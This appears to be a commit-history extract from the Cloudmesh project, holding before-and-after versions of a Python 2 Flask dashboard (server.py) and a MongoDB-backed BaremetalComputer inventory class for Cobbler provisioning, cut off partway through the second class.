############reading from yaml file ############
config_flavor = cm_config()
configurations= config_flavor.get(cloud) # name of default cloud will come here
default_flavor=configurations['default_flavor']
############ end of reading from yaml file ############
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
active = make_active('flavors')
selected = set_default_flavor(default_flavor, flavor_names)
if request.method == 'POST':
default_flavor= request.form['selected_flavor']
print default_flavor
############ writing in yaml file ############
yamlFile= config_flavor.get();
yamlFile['india-openstack']['default_flavor']=default_flavor;
testDict={}
testDict['cloudmesh']=yamlFile;
f = open(filename, "w")
yaml.safe_dump(testDict, f, default_flow_style=False, indent=4)
f.close()
############ end of writing in yaml file ############
selected = set_default_flavor(default_flavor, flavor_names)
if cloud == None:
pass
else:
return render_template('flavor.html',
updated=time_now,
clouds=clouds.clouds,
active=active,
version=version,selected=selected)
######################################################################
# ROUTE: IMAGES
######################################################################
def set_default_image(name, image_names):
global default_image;
default_image = name
selected = {}
for name in image_names:
selected[name] = ""
selected[default_image] = 'checked'
print default_image;
return selected
default_image = "ktanaka/ubuntu1204-ramdisk.manifest.xml"
def buildImageNamesArray(clouds):
image_names=[]
for name, cloud in clouds.iteritems():
for id, image in cloud['images'].iteritems():
image_names.append(id);
return image_names;
#@app.route('/images/<cloud>/')
@app.route('/images/', methods=['GET','POST'])
def display_images(cloud=None):
# for debugging
cloud = 'india-openstack'
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
active = make_active('images')
image_names=buildImageNamesArray(clouds.clouds);
############reading from yaml file ############
config_image = cm_config()
configurations= config_image.get(cloud) # name of default cloud will come here
default_image=configurations['default_image']
############ end of reading from yaml file ############
# default_image=image_names[0];
selected = set_default_image(default_image, image_names)
if request.method == 'POST':
default_image= request.form['selected-image']
print default_image
############ writing in yaml file ############
yamlFile= config_image.get();
yamlFile['india-openstack']['default_image']=default_image;
testDict={}
testDict['cloudmesh']=yamlFile;
f = open(filename, "w")
yaml.safe_dump(testDict, f, default_flow_style=False, indent=4)
f.close()
############ end of writing in yaml file ############
selected = set_default_image(default_image, image_names)
if cloud == None:
pass
else:
return render_template('images.html',
updated=time_now,
clouds=clouds.clouds,
active=active,
version=version,selected=selected)
######################################################################
# ROUTE: TEST
######################################################################
def set_default_cloud(name, cloud_names):
global default_cloud
default_cloud = name
selected = {}
for name in cloud_names:
selected[name] = ""
selected[default_cloud] = 'checked = ""'
return selected
default_cloud = "india-openstack"
@app.route('/gregor', methods=['GET','POST'])
def gregor():
global default_cloud
# default_cloud = "india-openstack"
#added by shweta
config_active = cm_config()
dict_t = config_active.get('active')
cloud_names = dict_t;
print cloud_names;
#end of additon by shweta
#cloud_names = ["india-openstack", "sierra-openstack"] code written by Gregor commented by shweta
selected = set_default_cloud(default_cloud, cloud_names)
if request.method == 'POST':
default_cloud= request.form['selected_cloud']
print default_cloud
selected = set_default_cloud(default_cloud, cloud_names)
return '''
<form action="" method="post">
<input type = "radio"
name = "selected_cloud"
id = "india-openstack"
value = "india-openstack"
%(india-openstack)s />
<label>india-openstack</label>
<input type = "radio"
name = "selected_cloud"
id = "sierra-openstack"
value = "sierra-openstack"
%(sierra-openstack)s/>
<label>sierra-openstack</label>
<input type=submit value=Update>
</form>''' %selected
######################################################################
# ROUTE: PROFILE
######################################################################
@app.route('/profile/')
def profile():
# bug the global var of the ditc should be used
config = cm_config()
dict_t = config.get()
makeCloudDict(dict_t)
active = make_active('profile')
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
persolalinfo = {'name': 'abc', 'data1': 'pqr'}
# bug: I guess this is left over from my example
# bug: the name of the clouds should be retrived from config. I guess this is left over from my example
cloudinfo = {
'openstak-india': {'type': 'openstack', 'host': 'india.futuregrid.org',
'username': 'shweta'}}
return render_template('profile.html',
updated=time_now,
keys="", # ",".join(clouds.get_keys()),
cloudinfo=makeCloudDict(dict_t),
persolalinfo=persolalinfo,
active=active,
version=version)
def makeCloudDict(dict_t):
cloudDict = {}
cloudSubDict = {}
cloudSubsubDict = {}
############# the below variables are used to display projects.html Here projects dict contains all the projects################
project_content={}
global projects;
projects={};
########### end of variables for display of projects.html###########################
for key, value in dict_t.iteritems():
# Bug: this should be changed based on a test of type
if "india-openstack" in key:
for innerKey, innerValue in value.iteritems():
innerKey = innerKey.replace("OS_", "")
innerKey = innerKey.replace("cm_", "")
cloudSubDict[innerKey.upper()] = innerValue
cloudDict[key.upper()] = cloudSubDict
cloudSubDict = {}
print (cloudDict)
if "india-eucalyptus" in key:
for innerKey, innerValue in value.iteritems():
if "fg" in innerKey:
for innermostKey, innermostValue in innerValue.iteritems():
project_content[innermostKey]=innermostValue
innermostKey = innermostKey.replace("EC2_", "")
cloudSubsubDict[innermostKey.upper()] = innermostValue
cloudDict[innerKey.upper()] = cloudSubsubDict
cloudSubsubDict = {}
projects[innerKey]=project_content;
project_content={};
else:
innerKey = innerKey.replace("EC2_", "")
cloudSubDict[innerKey.upper()] = innerValue
cloudDict[key.upper()] = cloudSubDict
cloudSubDict = {}
if "azure" in key:
cloudSubDict = {}
for innerKey, innerValue in value.iteritems():
cloudSubDict[innerKey.upper()] = innerValue
cloudDict[key.upper()] = cloudSubDict
cloudSubDict = {}
# print (cloudDict);
return cloudDict
######################################################################
# ROUTE: METRIC
######################################################################
#@app.route('/metric/<s_date>/<e_date>/<user>/<cloud>/<host>/<period>/<metric>')
@app.route('/metric/main', methods=['POST', 'GET'])
def metric():
global clouds
args = {"s_date": request.args.get('s_date', ''),
"e_date": request.args.get('e_date', ''),
"user": request.args.get('user', ''),
"cloud": request.args.get('cloud', ''),
"host": request.args.get('host', ''),
"period": request.args.get('period', ''),
"metric": request.args.get('metric', '')}
return render_template('metric.html',
clouds=clouds.get(),
metrics=clouds.get_metrics(args),
pages=pages,
active=make_active('metric'),
version=version)
######################################################################
# ROUTE: PAGES
######################################################################
@app.route('/<path:path>/')
def page(path):
active = make_active(str(path))
page = pages.get_or_404(path)
return render_template('page.html',
page=page,
pages=pages,
active=active,
version=version)
if __name__ == "__main__":
app.run()
Update server.py
made some changes in dict of project
import sys
sys.path.insert(0, './')
sys.path.insert(0, '../')
import os
import time
from flask import Flask, render_template, request
from flask_flatpages import FlatPages
from cloudmesh.cloudmesh import cloudmesh
from datetime import datetime
from cloudmesh.cm_config import cm_config
from datetime import datetime
import yaml
#### setting up reading path for the use of yaml################
default_path = '.futuregrid/cloudmesh.yaml'
home = os.environ['HOME']
filename = "%s/%s" % (home, default_path)
#### end of setting up reading path for the use of yaml################
DEBUG = True
FLATPAGES_AUTO_RELOAD = DEBUG
FLATPAGES_EXTENSION = '.md'
"""
import pkg_resources
version = pkg_resources.get_distribution("flask_cm").version
"""
version = "0.7.2"
clouds = cloudmesh()
clouds.refresh()
# clouds.load()
# AttributeError: cloudmesh instance has no attribute 'refresh'
# clouds.refresh()
# TEST CASE
######################################################################
# STARTING THE FLASK APP
######################################################################
app = Flask(__name__)
app.config.from_object(__name__)
pages = FlatPages(app)
######################################################################
# ACTIVATE STRUCTURE
######################################################################
def make_active(name):
active = {'home': "",
'table': "",
'contact': "",
'flavors': "",
'images': "",
'metric': "",
'profile': "",
'vm_info': "",
'projects': ""}
active[name] = 'active'
return active
######################################################################
# ROUTE: /
######################################################################
@app.route('/')
def index():
active = make_active('home')
return render_template('index.html',
pages=pages,
active=active,
version=version)
######################################################################
# ROUTE: REFRESH
######################################################################
@app.route('/cm/refresh/')
@app.route('/cm/refresh/<cloud>/')
def refresh(cloud=None, server=None):
print "-> refresh", cloud, server
global clouds
clouds.refresh()
return table()
######################################################################
# ROUTE: KILL
######################################################################
@app.route('/cm/kill/')
def kill_vms():
print "-> kill all"
r = cm("--set", "quiet", "kill", _tty_in=True)
return table()
######################################################################
# ROUTE: DELETE
######################################################################
@app.route('/cm/delete/<cloud>/<server>/')
def delete_vm(cloud=None, server=None):
print "-> delete", cloud, server
# if (cloud == 'india'):
# r = cm("--set", "quiet", "delete:1", _tty_in=True)
clouds.delete(cloud, server)
time.sleep(5)
global clouds
clouds.refresh()
return table()
######################################################################
# ROUTE: START
######################################################################
@app.route('/cm/start/<cloud>/')
def start_vm(cloud=None, server=None):
print "*********** STARTVM", cloud
print "-> start", cloud, server
# if (cloud == 'india'):
# r = cm("--set", "quiet", "start:1", _tty_in=True)
clouds.create(cloud, "gvonlasz", "001", "dummy")
return table()
'''
#gregorss test
@app.route('/cm/metric/<startdate>/<enddate>/<host>')
def list_metric(cloud=None, server=None):
print "-> generate metric", startdate, endadte
#r = fg-metric(startdate, enddate, host, _tty_in=True)
return render_template('metric1.html',
startdate=startdate,
active=active,
version=version,
endate=enddate)
#return table()
'''
######################################################################
# ROUTE: SAVE
######################################################################
@app.route('/save/')
def save():
print "Saving the cloud status"
global clouds
clouds.save()
return table()
######################################################################
# ROUTE: LOAD
######################################################################
@app.route('/load/')
def load():
print "Loading the cloud status"
global clouds
clouds.load()
return table()
######################################################################
# ROUTE: TABLE
######################################################################
@app.route('/table/')
def table():
global clouds
active = make_active('table')
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
# clouds.refresh("sierra-openstack")
# note thet call to sierra is fake it just goes to india and sets cloudname to sierra.
# clouds.dump()
# keys = clouds.get_keys()
return render_template('table.html',
updated=time_now,
keys="", # ",".join(clouds.get_keys()),
clouds=clouds.clouds,
image='myimage',
pages=pages,
active=active,
version=version)
######################################################################
# ROUTE: PROJECTS
######################################################################
@app.route('/projects/')
def project():
global projects;
active = make_active('projects')
config = cm_config()
dict_t = config.get()
makeCloudDict(dict_t) #from the profile function
return render_template('projects.html',
projects=projects,
active=active,
version=version)
######################################################################
# ROUTE: VM INFO
######################################################################
@app.route('/cm/info/<cloud>/<server>/')
def vm_info(cloud=None,server=None):
global clouds
active = make_active('vm_info')
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
return render_template('vm_info.html',
updated=time_now,
keys="",
server=clouds.clouds[cloud]['servers'][server],
id = server,
cloudname = cloud,
active=active,
version=version,
table_fun=maketablefromdict )
def maketablefromdict(the_dict):
return_str = ''
if isinstance(the_dict, dict):
for name,value in the_dict.iteritems() :
return_str =return_str +'<tr><td>'+name.title() +'</td><td>'+str(maketablefromdict(value))+'</td></tr>'
return_str = '<table>' + return_str + '</table>'
return return_str
elif type(the_dict) is list:
for element in the_dict:
for name,value in element.iteritems() :
return_str =return_str +'<tr><td>'+name.title()+'</td><td>'+str(maketablefromdict(value))+'</td></tr>'
return_str = '<table>' + return_str + '</table>'
return return_str
else:
return the_dict
######################################################################
# ROUTE: FLAVOR
######################################################################
def set_default_flavor(name, flavor_names):
global default_flavor;
default_flavor = name
selected = {}
for name in flavor_names:
selected[name] = ""
selected[default_flavor] = 'checked'
return selected
default_flavor = "m1.small"
def buildFlavorNamesArray(clouds):
flavor_names=[]
for name, cloud in clouds.iteritems():
for id, flavor in cloud['flavors'].iteritems():
flavor_names.append(flavor['name']);
return flavor_names;
#@app.route('/flavors/<cloud>/' )
@app.route('/flavors/', methods=['GET','POST'])
def display_flavors(cloud=None):
flavor_names=buildFlavorNamesArray(clouds.clouds);
# for debugging
cloud = 'india-openstack'
############reading from yaml file ############
config_flavor = cm_config()
configurations= config_flavor.get(cloud) # name of default cloud will come here
default_flavor=configurations['default_flavor']
############ end of reading from yaml file ############
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
active = make_active('flavors')
selected = set_default_flavor(default_flavor, flavor_names)
if request.method == 'POST':
default_flavor= request.form['selected_flavor']
print default_flavor
############ writing in yaml file ############
yamlFile= config_flavor.get();
yamlFile['india-openstack']['default_flavor']=default_flavor;
testDict={}
testDict['cloudmesh']=yamlFile;
f = open(filename, "w")
yaml.safe_dump(testDict, f, default_flow_style=False, indent=4)
f.close()
############ end of writing in yaml file ############
selected = set_default_flavor(default_flavor, flavor_names)
if cloud == None:
pass
else:
return render_template('flavor.html',
updated=time_now,
clouds=clouds.clouds,
active=active,
version=version,selected=selected)
######################################################################
# ROUTE: IMAGES
######################################################################
def set_default_image(name, image_names):
global default_image;
default_image = name
selected = {}
for name in image_names:
selected[name] = ""
selected[default_image] = 'checked'
print default_image;
return selected
default_image = "ktanaka/ubuntu1204-ramdisk.manifest.xml"
def buildImageNamesArray(clouds):
image_names=[]
for name, cloud in clouds.iteritems():
for id, image in cloud['images'].iteritems():
image_names.append(id);
return image_names;
#@app.route('/images/<cloud>/')
@app.route('/images/', methods=['GET','POST'])
def display_images(cloud=None):
# for debugging
cloud = 'india-openstack'
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
active = make_active('images')
image_names=buildImageNamesArray(clouds.clouds);
############reading from yaml file ############
config_image = cm_config()
configurations= config_image.get(cloud) # name of default cloud will come here
default_image=configurations['default_image']
############ end of reading from yaml file ############
# default_image=image_names[0];
selected = set_default_image(default_image, image_names)
if request.method == 'POST':
default_image= request.form['selected-image']
print default_image
############ writing in yaml file ############
yamlFile= config_image.get();
yamlFile['india-openstack']['default_image']=default_image;
testDict={}
testDict['cloudmesh']=yamlFile;
f = open(filename, "w")
yaml.safe_dump(testDict, f, default_flow_style=False, indent=4)
f.close()
############ end of writing in yaml file ############
selected = set_default_image(default_image, image_names)
if cloud == None:
pass
else:
return render_template('images.html',
updated=time_now,
clouds=clouds.clouds,
active=active,
version=version,selected=selected)
######################################################################
# ROUTE: TEST
######################################################################
def set_default_cloud(name, cloud_names):
global default_cloud
default_cloud = name
selected = {}
for name in cloud_names:
selected[name] = ""
selected[default_cloud] = 'checked = ""'
return selected
default_cloud = "india-openstack"
@app.route('/gregor', methods=['GET','POST'])
def gregor():
global default_cloud
# default_cloud = "india-openstack"
#added by shweta
config_active = cm_config()
dict_t = config_active.get('active')
cloud_names = dict_t;
print cloud_names;
#end of additon by shweta
#cloud_names = ["india-openstack", "sierra-openstack"] code written by Gregor commented by shweta
selected = set_default_cloud(default_cloud, cloud_names)
if request.method == 'POST':
default_cloud= request.form['selected_cloud']
print default_cloud
selected = set_default_cloud(default_cloud, cloud_names)
return '''
<form action="" method="post">
<input type = "radio"
name = "selected_cloud"
id = "india-openstack"
value = "india-openstack"
%(india-openstack)s />
<label>india-openstack</label>
<input type = "radio"
name = "selected_cloud"
id = "sierra-openstack"
value = "sierra-openstack"
%(sierra-openstack)s/>
<label>sierra-openstack</label>
<input type=submit value=Update>
</form>''' %selected
######################################################################
# ROUTE: PROFILE
######################################################################
@app.route('/profile/')
def profile():
# bug the global var of the ditc should be used
config = cm_config()
dict_t = config.get()
makeCloudDict(dict_t)
active = make_active('profile')
time_now = datetime.now().strftime("%Y-%m-%d %H:%M")
persolalinfo = {'name': 'abc', 'data1': 'pqr'}
# bug: I guess this is left over from my example
# bug: the name of the clouds should be retrived from config. I guess this is left over from my example
cloudinfo = {
'openstak-india': {'type': 'openstack', 'host': 'india.futuregrid.org',
'username': 'shweta'}}
return render_template('profile.html',
updated=time_now,
keys="", # ",".join(clouds.get_keys()),
cloudinfo=makeCloudDict(dict_t),
persolalinfo=persolalinfo,
active=active,
version=version)
def makeCloudDict(dict_t):
cloudDict = {}
cloudSubDict = {}
cloudSubsubDict = {}
############# the below variables are used to display projects.html Here projects dict contains all the projects################
project_content={}
global projects;
projects={};
########### end of variables for display of projects.html###########################
for key, value in dict_t.iteritems():
# Bug: this should be changed based on a test of type
if "india-openstack" in key:
for innerKey, innerValue in value.iteritems():
innerKey = innerKey.replace("OS_", "")
innerKey = innerKey.replace("cm_", "")
cloudSubDict[innerKey.upper()] = innerValue
cloudDict[key.upper()] = cloudSubDict
cloudSubDict = {}
print (cloudDict)
if "india-eucalyptus" in key:
for innerKey, innerValue in value.iteritems():
if "fg" in innerKey:
for innermostKey, innermostValue in innerValue.iteritems():
project_content[innermostKey]=innermostValue
innermostKey = innermostKey.replace("EC2_", "")
cloudSubsubDict[innermostKey.upper()] = innermostValue
cloudDict[innerKey.upper()] = cloudSubsubDict
cloudSubsubDict = {}
projects[innerKey]=project_content;
project_content={};
else:
innerKey = innerKey.replace("EC2_", "")
cloudSubDict[innerKey.upper()] = innerValue
cloudDict[key.upper()] = cloudSubDict
cloudSubDict = {}
if "azure" in key:
cloudSubDict = {}
for innerKey, innerValue in value.iteritems():
cloudSubDict[innerKey.upper()] = innerValue
cloudDict[key.upper()] = cloudSubDict
cloudSubDict = {}
# print (cloudDict);
return cloudDict
######################################################################
# ROUTE: METRIC
######################################################################
#@app.route('/metric/<s_date>/<e_date>/<user>/<cloud>/<host>/<period>/<metric>')
@app.route('/metric/main', methods=['POST', 'GET'])
def metric():
global clouds
args = {"s_date": request.args.get('s_date', ''),
"e_date": request.args.get('e_date', ''),
"user": request.args.get('user', ''),
"cloud": request.args.get('cloud', ''),
"host": request.args.get('host', ''),
"period": request.args.get('period', ''),
"metric": request.args.get('metric', '')}
return render_template('metric.html',
clouds=clouds.get(),
metrics=clouds.get_metrics(args),
pages=pages,
active=make_active('metric'),
version=version)
######################################################################
# ROUTE: PAGES
######################################################################
@app.route('/<path:path>/')
def page(path):
active = make_active(str(path))
page = pages.get_or_404(path)
return render_template('page.html',
page=page,
pages=pages,
active=active,
version=version)
if __name__ == "__main__":
app.run()
|
from dbhelper import DBHelper
from baremetal_status import BaremetalStatus
from hostlist import expand_hostlist
from copy import deepcopy
from cloudmesh.util.config import read_yaml_config
from cloudmesh_common.logger import LOGGER
from cloudmesh_install import config_file
#
# SETTING UP A LOGGER
#
log = LOGGER(__file__)
class BaremetalComputer:
"""Baremetal computer class.
First, this class also provide a easy API to initialize the cobbler baremetal computers in mongodb, e.g., mac and power info,
Second, this class have an API through which user can get the detail information to provision a cobbler baremetal computer
"""
def __init__(self):
coll_name = "inventory"
self.yaml_file = config_file("/mac.yaml")
self.db_client = DBHelper(coll_name)
self.bm_status = BaremetalStatus()
def get_default_query(self):
"""
query helper function.
:return: the default query field.
"""
return { "cm_type": "inventory",
"cm_kind": "server",
"cm_attribute": "network",
"cm_key": "server",
}
def get_full_query(self, query_elem=None):
"""
merge the default query and user defined query.
:return: the full query dict
"""
result = self.get_default_query()
if query_elem:
result.update(query_elem)
return result
def read_data_from_yaml(self):
"""
read mac address and bmc configuration information from **mac.yaml** file.
"""
data = read_yaml_config(self.yaml_file)
result = None
if data:
result = {}
data = data["inventory"]
for cluster in data:
cluster_data = data[cluster]
if "bmc" in cluster_data and "common" in cluster_data["bmc"]:
# process the common bmc data in cluster
common_bmc_data = cluster_data["bmc"]["common"]
host_range = common_bmc_data.pop("range", None)
hosts = expand_hostlist(host_range)
mac_data = cluster_data["macaddr"]
for host in mac_data:
if host in hosts:
temp_common_bmc_data = deepcopy(common_bmc_data)
if "bmc" in mac_data[host]:
# bmc config in individual host have a high priority than common config
temp_common_bmc_data.update(mac_data[host]["bmc"])
mac_data[host]["bmc"] = temp_common_bmc_data
result[cluster] = mac_data
return result
def insert_mac_data_to_inventory(self):
"""
Insert the mac address information including power config into inventory.
This API should be called **BEFORE** baremetal provision.
Currently, this API is called by **fab mongo.inventory**
"""
# insert a document of baremetal computers list
self.insert_blank_baremetal_list()
# insert mac data
data = self.read_data_from_yaml()
result = False
if data and len(data) > 0:
result = self.update_mac_address(data)
return result
def update_mac_address(self, mac_dict):
"""
update *inventory* db with mac address information.
:param dict mac_dict: a dict with the following formation. *label_name* is the *cm_id* defined in inventory.
*internal* or *public* is the type defined in inventory.
{"cluster_name":{
"label_name": {"internal": {"name":"eth0", "macaddr": "aa:aa:aa:aa:aa:aa"},
"public": {"name":"eth1", "macaddr": "aa:aa:aa:aa:aa:ab"},
"bmc": {"user": "user_name", "pass": "password", "type": "type",},}
}
:return: True means all the mac address in mac_dict updated successfully; False means failed.
"""
result = True
if mac_dict:
for cluster in mac_dict: # cluster
cluster_data = mac_dict[cluster]
for host_id in cluster_data: # host
host_data = cluster_data[host_id]
for network_type in host_data: # network
network_data = host_data[network_type]
query_elem = {"cm_id": host_id, "type": network_type, "cm_cluster": cluster,}
if network_type in ["bmc"]: # power config information
update_elem = network_data
else:
update_elem = {"ifname": network_data["name"],
"macaddr":network_data["macaddr"],
}
update_result = self.db_client.atom_update(self.get_full_query(query_elem),
{"$set": update_elem}, False)
if not update_result["result"]:
result = False
break
if not result:
break
if not result:
break
return result
def get_host_info(self, host_id, info_format="cobbler"):
"""
get the required host info for baremetal computer.
:param string host_id: the unique name/id of a node in cloudmesh
:param string info_format: the dest info format of general host info. To support a new formation, such as *xtest*, the API get_host_info_xtest MUST be provided.
:return: a dict with the following formation if info_format is None, otherwise return the use specified formation conerted from the default one.
{
"id": "unique ID",
"power": {"ipaddr": ipaddr, "power_user": user, "power_pass": pass, "power_type": type,},
"interfaces": [{"name": "eth0", "ipaddr": ipaddr, "macaddr": macaddr,}],
}
"""
query_elem = {"cm_id": host_id}
full_query_elem = self.get_full_query(query_elem)
find_result = self.db_client.find(full_query_elem)
result = None
if find_result["result"]:
result = {"id": host_id, "power":{}}
data = find_result["data"]
interface_list = []
cluster_id = None
for record in data:
if "macaddr" in record: # general network interface
interface_list.append({"name": record["ifname"],
"ipaddr": record["ipaddr"],
"macaddr": record["macaddr"],
})
if record["type"] == "public":
result["hostname"] = record["label"]
cluster_id = record["cm_cluster"]
elif "power_user" in record: # ipmi network interface
power_key_list = ["ipaddr", "power_user", "power_pass", "power_type",]
for key in power_key_list:
result["power"][key] = record[key]
# sort the inteface with ascending order
result["interfaces"] = sorted(interface_list, key=lambda k: k["name"])
if cluster_id:
# try to find name server for the servers in this cluster
name_servers = self.get_cluster_name_server(cluster_id)
if name_servers:
result["name_servers"] = name_servers
if info_format:
getattr(self, "get_host_info_{0}".format(info_format))(result)
return result
def get_cluster_name_server(self, cluster_id):
"""find the name servers for a cluster
:param string cluster_id: the unique ID of a cluster
:return: None if not exist a name server for the cluster, otherwise a string represents the one or more name servers
"""
query_elem = {"cm_id": cluster_id, "cm_key": "nameserver", "cm_attribute": "variable"}
full_query_elem = self.get_full_query(query_elem)
find_result = self.db_client.find(full_query_elem)
result = []
if find_result["result"]:
data = find_result["data"]
for record in data:
result.append(record["cm_value"])
return None if len(result) < 1 else " ".join(result)
def change_dict_key(self, data_dict, fields):
"""
change the key in dict from old_key to new_key.
:param dict fields: the projection from old_key to new_key. {"old_key": "new_key"}
"""
for key in fields:
if key in data_dict:
data_dict[fields[key]] = data_dict.pop(key)
def fill_dict_default_key(self, data_dict, fields):
"""
fill the dict with default key-value pair.
:param dict fields: the default key-value pair. {"key": "default"}
"""
for key in fields:
if key not in data_dict:
data_dict[key] = fields[key]
def get_host_info_cobbler(self, host_dict):
"""
convert general host info dict to the formation of cobbler host formation
"""
# section 1, general fields
general_fields = {"id": "name", "name_servers": "name-servers",}
self.change_dict_key(host_dict, general_fields)
# section 2, power fields
power_fields = {"ipaddr": "power-address",
"power_user": "power-user",
"power_pass": "power-pass",
"power_type": "power-type",
}
power_default = {"power-id": 2,
}
self.change_dict_key(host_dict["power"], power_fields)
self.fill_dict_default_key(host_dict["power"], power_default)
# section 3, interface fields
interface_fields = {"ipaddr": "ip-address",
"macaddr": "mac-address",
}
interface_default = {"netmask": "255.255.255.0",
"static": True,
}
for one_interface in host_dict["interfaces"]:
self.change_dict_key(one_interface, interface_fields)
self.fill_dict_default_key(one_interface, interface_default)
def insert_blank_baremetal_list(self):
"""insert a blank document of baremetal computers list into mongodb
ONLY called ONCE by **fab mongo.inventory**
"""
elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory",}
result = self.db_client.find_one(elem)
flag_insert = True
if result["result"] and result["data"]:
flag_insert = False
if not flag_insert:
return True
result = self.db_client.insert(elem)
return result["result"]
def enable_baremetal_computers(self, hosts):
"""add the list of *hosts* to be baremetal computers
:param list hosts: the list of hosts with the formation ["host1", "host2",]
:return: True means enabled successfully, otherwise False
"""
if hosts:
query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
update_elem = {"$addToSet":{"data": {"$each": hosts}}}
result = self.db_client.atom_update(query_elem, update_elem)
return result["result"]
return True
def disable_baremetal_computers(self, hosts):
"""remove the list of *hosts* from baremetal computers
:param list hosts: the list of hosts with the formation ["host1", "host2",]
:return: True means disabled successfully, otherwise False
"""
if hosts:
query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
update_elem = {"$pull":{"data": {"$in": hosts}}}
result = self.db_client.atom_update(query_elem, update_elem)
return result["result"]
return True
def get_baremetal_computers(self):
"""get the list of baremetal computers
:return: the list of hosts with the formation ["host1", "host2",] or None if failed
"""
query_elem = {"cm_kind": "baremetal", "cm_type": "bm_list_inventory", }
result = self.db_client.find_one(query_elem)
if result["result"]:
return result["data"]["data"] if "data" in result["data"] else []
return None
# test
if __name__ == "__main__":
from pprint import pprint
bmc = BaremetalComputer()
"""
data = bmc.insert_mac_data_to_inventory()
print data
for host in ["???", "???", "???"]:
data = bmc.get_host_info(host)
pprint(data)
"""
#result = bmc.get_host_info("i080")
#result = bmc.insert_blank_baremetal_list()
#result = bmc.enable_baremetal_computers(["i001", "i003", "i007", "i189"])
#result = bmc.disable_baremetal_computers(["i001", "i007",])
result = bmc.get_baremetal_computers()
pprint(result)
update the mac.yaml to its unique name
from dbhelper import DBHelper
from baremetal_status import BaremetalStatus
from hostlist import expand_hostlist
from copy import deepcopy
from cloudmesh.util.config import read_yaml_config
from cloudmesh_common.logger import LOGGER
from cloudmesh_install import config_file
#
# SETTING UP A LOGGER
#
log = LOGGER(__file__)
class BaremetalComputer:
"""Baremetal computer class.
First, this class also provide a easy API to initialize the cobbler baremetal computers in mongodb, e.g., mac and power info,
Second, this class have an API through which user can get the detail information to provision a cobbler baremetal computer
"""
def __init__(self):
coll_name = "inventory"
self.yaml_file = config_file("/cloudmesh_mac.yaml")
self.db_client = DBHelper(coll_name)
self.bm_status = BaremetalStatus()
def get_default_query(self):
"""
query helper function.
:return: the default query field.
"""
return { "cm_type": "inventory",
"cm_kind": "server",
"cm_attribute": "network",
"cm_key": "server",
}
def get_full_query(self, query_elem=None):
"""
merge the default query and user defined query.
:return: the full query dict
"""
result = self.get_default_query()
if query_elem:
result.update(query_elem)
return result
def read_data_from_yaml(self):
"""
read mac address and bmc configuration information from **mac.yaml** file.
"""
data = read_yaml_config(self.yaml_file)
result = None
if data:
result = {}
data = data["inventory"]
for cluster in data:
cluster_data = data[cluster]
if "bmc" in cluster_data and "common" in cluster_data["bmc"]:
# process the common bmc data in cluster
common_bmc_data = cluster_data["bmc"]["common"]
host_range = common_bmc_data.pop("range", None)
hosts = expand_hostlist(host_range)
mac_data = cluster_data["macaddr"]
for host in mac_data:
if host in hosts:
temp_common_bmc_data = deepcopy(common_bmc_data)
if "bmc" in mac_data[host]:
# bmc config in individual host have a high priority than common config
temp_common_bmc_data.update(mac_data[host]["bmc"])
mac_data[host]["bmc"] = temp_common_bmc_data
result[cluster] = mac_data
return result
def insert_mac_data_to_inventory(self):
"""
Insert the mac address information including power config into inventory.
This API should be called **BEFORE** baremetal provision.
Currently, this API is called by **fab mongo.inventory**
"""
# insert a document of baremetal computers list
self.insert_blank_baremetal_list()
# insert mac data
data = self.read_data_from_yaml()
result = False
if data and len(data) > 0:
result = self.update_mac_address(data)
return result
def update_mac_address(self, mac_dict):
"""
update *inventory* db with mac address information.
:param dict mac_dict: a dict with the following formation. *label_name* is the *cm_id* defined in inventory.
*internal* or *public* is the type defined in inventory.
{"cluster_name":{
"label_name": {"internal": {"name":"eth0", "macaddr": "aa:aa:aa:aa:aa:aa"},
"public": {"name":"eth1", "macaddr": "aa:aa:aa:aa:aa:ab"},
"bmc": {"user": "user_name", "pass": "password", "type": "type",},}
}
:return: True means all the mac address in mac_dict updated successfully; False means failed.
"""
result = True
if mac_dict:
for cluster in mac_dict: # cluster
cluster_data = mac_dict[cluster]
for host_id in cluster_data: # host
host_data = cluster_data[host_id]
for network_type in host_data: # network
network_data = host_data[network_type]
query_elem = {"cm_id": host_id, "type": network_type, "cm_cluster": cluster,}
if network_type in ["bmc"]: # power config information
update_elem = network_data
else:
update_elem = {"ifname": network_data["name"],
"macaddr":network_data["macaddr"],
}
update_result = self.db_client.atom_update(self.get_full_query(query_elem),
{"$set": update_elem}, False)
if not update_result["result"]:
result = False
break
if not result:
break
if not result:
break
return result
def get_host_info(self, host_id, info_format="cobbler"):
"""
get the required host info for baremetal computer.
:param string host_id: the unique name/id of a node in cloudmesh
:param string info_format: the dest info format of general host info. To support a new formation, such as *xtest*, the API get_host_info_xtest MUST be provided.
:return: a dict with the following formation if info_format is None, otherwise return the use specified formation conerted from the default one.
{
"id": "unique ID",
"power": {"ipaddr": ipaddr, "power_user": user, "power_pass": pass, "power_type": type,},
"interfaces": [{"name": "eth0", "ipaddr": ipaddr, "macaddr": macaddr,}],
}
"""
query_elem = {"cm_id": host_id}
full_query_elem = self.get_full_query(query_elem)
find_result = self.db_client.find(full_query_elem)
result = None
if find_result["result"]:
result = {"id": host_id, "power":{}}
data = find_result["data"]
interface_list = []
cluster_id = None
for record in data:
if "macaddr" in record: # general network interface
interface_list.append({"name": record["ifname"],
"ipaddr": record["ipaddr"],
"macaddr": record["macaddr"],
})
if record["type"] == "public":
result["hostname"] = record["label"]
cluster_id = record["cm_cluster"]
elif "power_user" in record: # ipmi network interface
power_key_list = ["ipaddr", "power_user", "power_pass", "power_type",]
for key in power_key_list:
result["power"][key] = record[key]
# sort the inteface with ascending order
result["interfaces"] = sorted(interface_list, key=lambda k: k["name"])
if cluster_id:
# try to find name server for the servers in this cluster
name_servers = self.get_cluster_name_server(cluster_id)
if name_servers:
result["name_servers"] = name_servers
if info_format:
getattr(self, "get_host_info_{0}".format(info_format))(result)
return result
def get_cluster_name_server(self, cluster_id):
"""find the name servers for a cluster
:param string cluster_id: the unique ID of a cluster
:return: None if not exist a name server for the cluster, otherwise a string represents the one or more name servers
"""
